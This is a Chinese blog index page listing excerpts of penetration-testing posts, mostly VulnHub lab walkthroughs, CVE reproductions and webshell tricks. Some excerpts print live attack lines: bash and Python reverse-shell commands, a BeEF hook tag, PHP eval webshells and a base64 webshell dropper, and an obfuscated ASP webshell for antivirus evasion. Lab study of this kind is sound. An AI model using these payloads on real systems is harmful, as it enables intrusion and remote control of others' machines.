自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(84)
  • 收藏
  • 关注

原创 AMSI对抗小结

前言AMSI是微软用来对抗无文件攻击而开发的安全模块,是当前攻防对抗前沿的技术 之一从15年AMSI出现,越来越多的杀软厂商接入了AMSI接口,当前市面上主流杀软均接入此接口这给当时以powershell为主的红队工具致命打击,像Empire,等等总体来说,由于AMSI仅仅是一个连接应用程序和杀软程序的通道,微软主要还是在defender上做各种对抗,针对通道本身的加固较少。红队工具也寻找了另外一条出路就是.Net,使用C#开发的红队工具随之兴起。随着以.NET(C#)为基础的攻击技术的逐渐成熟

2021-11-11 22:52:10 15424

原创 Potato提权小结

前言当我们拿到webshell 却苦于无法提权早之前有巴西烤肉提权,有pr提权今天 来一个土豆提权合集妈妈再也不担心我的webshell无法提权了Hot Potato前言利用 Windows 中的已知问题在默认配置中获得本地权限提升即 NTLM 中继(特别是 HTTP->SMB 中继)和 NBNS 欺骗攻击者可以在安装了Windows操作系统的工作站中将自己的低权限提升至NT AUTHORITY\SYSTEM影响范围Windows 7、8、10、Server 2008 和 Ser

2021-11-11 22:50:30 17369

原创 SPN发现与利用

0x01 简介服务主体名称(SPN)是Kerberos客户端用于唯一标识给特定Kerberos目标计算机的服务实例名称。Kerberos身份验证使用SPN将服务实例与服务登录帐户相关联。如果在整个林中的计算机上安装多个服务实例,则每个实例都必须具有自己的SPN。如果客户端可能使用多个名称进行身份验证,则给定的服务实例可以具有多个SPN0x02类型SPN 可以分为两种:当一个服务的权限为Local System或Network Service,则SPN注册在域内机器帐户(Computers)下

2021-04-15 19:53:26 17500

原创 SSRF漏洞浅析+ctfhub简单实战

花时间 写一下SSRF 凑合看吧 2020/3/24 14.26漏洞原理SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成并由服务端发起恶意请求的一个安全漏洞。正是因为恶意请求由服务端发起,而服务端能够请求到与自身相连而与外网隔绝的内部网络系统,所以一般情况下,SSRF的攻击目标是攻击者无法直接访问的内网系统。ssrf csrf 重放攻击 换行注入漏洞成因SSRF漏洞的形成大多是由于服务端提供了从其他服务器应用获取数据的功能而没有对目标地

2021-03-27 15:16:06 14412

原创 域信息收集-csvde工具

CSVDE作用:用于管理AD上的用户利用csvde命令导出域的信息,导出文件一般以csv结尾,这个命令好像安装了活动目录才有命令:csvde -setspn 域名 -f 导出文件位置

2021-02-24 09:49:55 14299

原创 域信息收集之普通域用户权限获取域里详细信息-ldifde 工具

ldifde 工具适用于:Windows Server 2003,Windows Server 2008,Windows Server 2008 R2,Windows Server 2012,带有SP1,Windows 8的Windows Server 2003前沿适用场景:內网环境有域环境,掌握一个域用户的账号密码作用:能够把域里面的所有信息导出来(域用户域机器等详细信息)使用ldifde.exe -f 导出的文件名 -s 域控IP -b 普通域用户名 域名 普通域用户密码...

2021-02-24 09:46:30 14132

原创 登录口JS前端加密绕过-jsEncrypter工具

概述渗透测试过程中遇到web登录的时候,现在很多场景账号密码都是经过js加密之后再请求发送(通过抓包可以看到加密信息)burp抓到的包,request的post的登录包,password参数的值是经过前端加密之后再进行传输的,遇到这种情况,普通发包的爆破脚本就很难爆破成功。鉴于这种情况,这边分析四种方式进行绕过加密爆破这里主要讲一种 大佬的工具jsEncrypterjsEncrypter工具https://github.com/c0ny1/jsEncrypter安装流程安装maven具

2021-02-24 09:39:17 15324

原创 Beef工具使用

今天写一下这个工具Beef我这里用kali启动Apache:service apache2 start然后安装Beef工具我用脚本安装命令:apt-get updateapt-get install beef-xssapt-get install beef-xssbeef-xss启动之后Hook: <script src="http://<IP>:3000/hook.js"></script>会弹出来beef的登录窗口这边我们在看一下bee

2021-02-22 17:59:52 16737

原创 CVE-2019-1388:通过UAC进行Windows提权

0x01 漏洞介绍CVE-2019-1388 | Windows证书对话框特权提升漏洞如果 Windows 证书对话框没有正确执行用户特权,则存在特权提升漏洞。成功利用此漏洞的攻击者可以在提升的环境中运行进程。然后,攻击者可能会安装程序,查看、更改或删除数据。要利用此漏洞,攻击者首先必须以普通用户权限登录系统。然后攻击者运行一个精心调制的应用,该应用可以利用此漏洞并控制受影响的系统。该安全更新通过确保 Windows 证书对话框正确执行用户特权来解决该漏洞。0x02 漏洞原理此漏洞是因为 UAC

2021-02-22 11:34:44 14154

原创 Sudo漏洞分析(CVE-2019-14287)

漏洞介绍最近的国外的团队跟踪并披露了该漏洞,报告中发现,在所有sudo版本低于1.8.29 的Linux机器,均受到该漏洞的影响。CVE编号:CVE-2019-14287此漏洞可以使用户拥有权限运行其他用户命令。漏洞细节sudo允许非特权用户以root用户身份执行命令,问题在于在sudo id 在低于1.8.29 版本中以任意用户实现了运行命令的方式,虽然攻击的利用方式,需要对本地配置进行修改,利用此漏洞需要恶意用户具有以任何用户(root用户除外)身份运行命令的特权,如果sudoers文件ALL

2021-02-21 11:34:50 14857

原创 Linux下反弹shell和交互式shell命令

bash反弹shell接收端:nc -lvvp 端口发送端:bash -i >& /dev/tcp/接收端IP/接收端端口 0>&1python反弹shell接收端:nc -lvvp 端口发送端:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("接收端IP",接收端端口));os.dup2(s.fileno(),

2021-02-20 11:29:47 16170

原创 小白的靶机VulnHub-Pinky‘s Palace: v3

靶机地址:https://www.vulnhub.com/entry/pinkys-palace-v3,237/开机界面 就是这样确定了靶机的IP地址:192.168.106.150靶机开放了21、5555、8000端口一个一个来21端口 ftp服务可以匿名访问5555端口有ssh服务8000端口有http服务 运行了Drupal打开康康让我们尽量不要使用metasploit工具kali上ftp匿名登录 去底层 康康匿名登录 就是账号:ftp密码:空这边遇到一个问题

2021-02-19 12:36:34 14297

原创 小白的靶机VulnHub-SolidState

靶机地址:https://www.vulnhub.com/entry/solidstate-1,261/开机界面就是这样拿到靶机的IP地址:192.168.106.151可以看到的靶机开放了22(ssh)、25(smtp)、80(http)、110(pop3)、119(nntp)、4555(james-admin)这里有一个漏洞:JAMES Remote Admin 2.3.2存在漏洞具体可以看这里那我们就直接去4555端口因为是Remote Admin Service 所以我们上nc连

2021-02-18 12:12:14 14083 1

原创 小白的靶机VulnHub-Wallaby‘s: Nightmare (v1.0.2)

靶机地址:https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/开机界面就是这样还是 采用的桥接模式确定靶机的IP地址:192.168.1.10靶机开放了22、80端口直接访问随意输入一个用户名看这个参数 /?page=之前总结过直接/etc/passwd上nikto扫扫被拒绝了请求我淦 重新扫描一下发现80端口关闭了。。。但是60080端口开启了http服务继续扫目录有很多的目录一个一个看一下

2021-02-13 14:16:18 14036

原创 Solr Velocity模板远程代码执行漏洞复现

下载https://www.apache.org/dyn/closer.lua/lucene/solr/8.2.0/solr-8.2.0.zip报错了这边是需要手动添加的

2021-02-11 14:06:43 13970

原创 小白的靶机BSides-Vancouver-2018-Workshop

靶机地址:https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop%2C231/开机界面就是这样确定靶机的IP地址:192.168.72.131靶机开放了21、22、80端口访问页面呗源码 F12 找了一波 没撒子东西直接上gobuster 扫描一下命令:gobuster dir -u http://192.168.72.131 -w /usr/share/dirb/wordlists/common.txt这个命令的参

2021-02-06 11:02:54 13801

原创 PHP 远程代码执行漏洞复现CVE-2019-11043

漏洞名称PHP 远程代码执行漏洞复现CVE-2019-11043准备工作:安装 dockersudo apt-get install docker docker-compose我这边已经安装过了 查看一下docker的版本安装golang 环境sudo apt install golang搭建漏洞环境git clone https://github.com/vulhub/vulhub.gitcd vulhub/php/CVE-2019-11043docker-compose up -d

2021-02-05 21:23:28 13855

原创 小白的靶机VulnHub-DC:6

靶机地址:https://www.vulnhub.com/entry/dc-6,315/开机界面就是这样确定 靶机的IP地址:192.168.106.14222和80端口开放着按照题目要求 添加wordy做重定向访问页面 确定为wordpress框架直接上wpscan 扫扫呗这边我更新了一下wpscan 报了403的错误这边贴一个链接 解决有五个用户名 制作–>name.txt在制作一下字典(作者给的提示)命令:cat /usr/share/wordlists/

2021-02-04 09:58:06 13772

原创 小白的靶机VulnHub-Node

靶机地址:https://www.vulnhub.com/entry/node-1,252/开机界面就是这样确定靶机的IP地址:192.168.72.130可以看到开放了22和3000端口又看到了Node.js 好耶 这个我熟哇访问3000端口的页面呗弱口令 失败扫目录 康康 都是 回显的这个 页面 没啥有用的信息该web界面使用node.js编写,通过F12审计js源码主要是这里网站使用的javascript文件一个一个打开康康最后在这里/assets/js/app/

2021-02-03 09:08:52 13805 2

原创 小白的靶机VulnHub-Web Developer

靶机地址:https://www.vulnhub.com/entry/web-developer-1,288/开机界面 就是这样同样是选择桥接确定靶机的IP地址:192.168.1.10靶机开放了22和80端口还是wordpress框架访问康康呗dirb直接扫目录发现目录/ipdata有一个数据包 用wireshark 打开分析一下过滤下http的数据包信息 然后就发现了 账号密码账号:webdeveloper密码:Te5eQg&4sBS!Yr$)wf%(DcAd

2021-02-02 21:18:19 13990

原创 小白的靶机VulnHub-zico2

靶机地址:https://www.vulnhub.com/entry/zico2-1,210/依然是选择桥接开机界面就是这样确定靶机的IP地址可以看到靶机开启了22、80、111、50702端口直接访问页面

2021-02-01 12:06:57 188

原创 小白的靶机VulnHub-Temple of Doom

靶机地址:https://www.vulnhub.com/entry/temple-of-doom-1,243/开机界面就是这确定 靶机的ip地址:192.168.0.114靶机开放了22端口666端口22端口 是ssh服务 没账号密码 是进不去的 先放着666端口 有http服务,有Node.js 去康康呗直接访问正在施工,稍后再来!直接爆破一下 试试nikto 和dirb …没啥有用的信息这里 666端口 开放了Node.js...

2021-01-20 19:58:53 616

原创 小白的靶机VulnHub-Mr-Robot

靶机地址:https://www.vulnhub.com/entry/mr-robot-1,151/用桥接开机界面就是这样确定本次靶机的地址:192.168.0.112扫到了22、80和443端口直接上网页瞧瞧呗直接尝试/robots.txt 发现可以发现第一个Key 还有一个.dic后缀的文件http://192.168.0.112/key-1-of-3.txt将.dic后缀的文件下载到Kail上 进行分析 我猜应该是一个字典查看文件大小这也太大了吧打开一看

2021-01-20 08:24:20 384

原创 小白的靶机VulnHub-pWnOS

靶机地址:https://www.vulnhub.com/entry/pwnos-20-pre-release,34/这个靶机有点特殊靶机默认设置:IP: 10.10.10.100Netmask: 255.255.255.0Gateway: 10.10.10.15所以攻击机需要在10.10.10.0/24网段所以新添加一个网段 将攻击机(KALI)和靶机网络适配器都选到这个模式靶机IP是固定的:10.10.10.100开放了 22 和 80端口上网页康康...

2021-01-19 18:13:12 240

原创 小白的靶机VulnHub-Vulnix

靶机地址:https://www.vulnhub.com/entry/hacklab-vulnix,48/开机界面就是个这确定本次靶机的IP地址:192.168.106.132可以看到的 开放了很多的端口现在 就25端口 进行渗透在端口25SMTP栏下我们看到VRFY(用于验证指定的用户/邮箱是否存在;由于安全原因,服务器常禁止此命令)没有被禁用从SMTP入手;使用工具smtp-user-enum枚举用户(此处用VRFY方式);(也可以用metasploit辅助模块:smtp_enum)此

2021-01-18 14:45:48 579

原创 小白的靶机VulnHub-FristiLeaks

靶机地址:https://www.vulnhub.com/entry/fristileaks-13,133/这台靶机有点特殊奥开机界面 就是个这

2021-01-15 23:08:21 164

原创 二维码刷新不出来

win+r然后输入inetcpl.cpl打开之后点击高级进行 重置 就可以了

2021-01-12 12:18:06 6047

原创 小白的靶机VulnHub-PwnLab

靶机地址:https://www.vulnhub.com/entry/vulnos-2,147/这台靶机 开机遇到一些小麻烦把这个 对号去掉就可以了还是 一如既往 使用桥接开机 界面 就是个这确定本次 靶机的ip地址:192.168.0.109确定 开放的端口 和详细信息22–>ssh服务80–>Web服务器6667–>IRC服务器直接上 页面访问 康康呗源代码 F12 一顿 找 没啥有用的信息但是 通常 都是有可用的信息啊然后 很坑原页面 如上 当

2021-01-11 10:19:07 277

原创 小白的靶机VulnHub-Raven

靶机地址:https://www.vulnhub.com/entry/raven-1,256/目标:找到四个flag.txt信息开机界面就是个这确定本次靶机地址:192.168.125.128发现了22、80、111和36898端口是开放的直接访问 康康呗拿到flag1flag1{b9bbcb33e11b80be759c4e844862482d}继续 回去康康发现他是wordpress这个 我懂 直接上wpscan 扫它呗命令:wpscan --url http://192

2021-01-05 18:02:25 387

原创 shiro反序列化漏洞

今天 把之前 落下来的 捡起来 师傅轻捶好 要上了哦!!漏洞发现1.Shiro rememberMe反序列化漏洞(Shiro-550)0x01漏洞原理Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值 的流程是这样的RememberMe Cookie值->base64解密->AES解密->反序列化这就导致了反序列化RCE漏洞我们 构造的payloa

2020-12-29 18:35:51 504

原创 小白的靶机VulnHub-SickOs2

靶机地址:https://www.vulnhub.com/entry/sickos-12,144/开机界面 就是个这此次CTF目标计算机IP地址:192.168.56.106开了22 和80端口直接dirb扫目录 nikto检查是否存在漏洞轻车熟路打一套发现了/test 目录访问一下图片下载下来 查一查 没啥信息这只是一个目录列表…测试了针对lighttpd 1.4.28的各种漏洞利用和漏洞,但是它们均不适用于SickOs…使用curl检查目录test上可用的HTTP

2020-12-29 15:46:13 215

原创 小白的靶机VulnHub-SickOs

靶机地址:https://www.vulnhub.com/entry/sickos-11,132/开机界面就是个这找到了此次CTF目标计算机IP地址:22、3128、8080端口

2020-12-28 20:38:56 1147

原创 小白的靶机VulnHub-SkyTower

靶机地址:https://www.vulnhub.com/entry/skytower-1,96/开机界面 就是个这同样是使用桥接找到了此次CTF目标计算机IP地址:192.168.56.101开放了22(filtered)、80、3128代理端口…盒子都有代理…先访问网页试试这边 直接 进行测试 发现 是可以sql注入的得到用户名和密码Username: johnPassword: hereisjohn尝试 ssh 登录 发现 是不可以的但是根据nmap扫出的结果 它是开了代

2020-12-28 10:30:13 431

原创 XXE漏洞从0到1

1

2020-12-27 21:38:26 168

原创 小白的靶机VulnHub-Stapler

从这一台靶机开始就要上开机界面就是个这就凑合一下 开桥接确定靶机ip地址 :192.168.56.102要上 了哦!!!!!扫出 好多 好多 端口 像极了一个蜜罐我淦从ftp 入手吧 进行匿名登录进行查看 下载到本地打开 康康Elly说请确保更新了有效负载信息,完成后将其保留在您的FTP帐户中,John拿到俩个用户Elly和John继续 ssh 进行 登录尝试失败看80端口使用nikto(开源WEB安全扫描器)进行扫描试试…没啥用信息 先放着继续

2020-12-27 17:37:52 564 1

原创 webshell免杀小工具

ASP绕过相比于php ,asp就很不灵活了,许多编码函数不自带,注释无法隔断函数关键字与括号。但是依然有不少方法可以绕过首先asp的一句话木马如下:<%execute(request("x"))%>使用函数分割关键字<%Function b(): b = request("x")End FunctionFunction a(): eXecUTe(b())End Functiona()%>连接密码:x批量脚本import r

2020-12-25 10:30:40 554

原创 小白的靶机VulnHub-Tr0ll2

找到了此次CTF目标计算机IP地址:192.168.86.17421、22、80端口直接访问查看 源代码 图片下载 进行 查看发现作者是Tr0ll 可能 是一个 有效的用户名直接尝试/robots目录把这个文件robots.txt下载下来 剔除反斜杠,使用dirb进行批量尝试,挖掘可用的目录发现4个可用的目录以此访问上述4个目录,并查看其网页源码发现有用的信息四个目录都是如此下载下来 strings分析看一下根据上面提示获得存在隐藏目录y0ur_self 尝试.

2020-12-25 09:39:55 394 3

原创 小白的靶机-VulnHub-IMF

靶机地址:https://www.vulnhub.com/entry/imf-1,162/目标:得到root权限&找到四个flag.txt开机界面就是个这确定靶机地址:192.168.86.172发现80端口 运行着Apache 直接上页面康康这个选项右键源代码发现flag1flag1{YWxsdGhlZmlsZXM=}发现这是一个base64的加密 进行解码 allthefiles还有一个base64加密的标签 解码康康这里有一个坑 他们三个 是连在一起的 只有

2020-12-24 15:59:13 325 1

原创 织梦dedecms的框架的Webshell

一、后台后台登录 http://www.dedecms.com/dede后台界面二、Webshell方法方法1:文件上传蚁剑进行连接成功方法2:新建一句话文件蚁剑连接方法3:html修改打开模板-默认模版管理-index.htm文件包含将FTP21端口改成:<?php @eval($_REQUEST["dayu"]); ?>...

2020-12-19 16:58:19 349 1

原创 PHPcms框架的Webshell

登录界面后台网址www.phpcms.com/admin.php进入主页面代码注入拿webshell接下来 我直接就上图了写入一句话木马<?php file_put_contents('ooo.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FhXSk7Pz4=')); ?>查看专题继续添加第二个专题利用burpsuit拦截将代码写入,意思是将专题dayu2-扩展设置-专题首页里的index写入代码调用专题ooo1中的一

2020-12-19 16:58:10 366 2

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除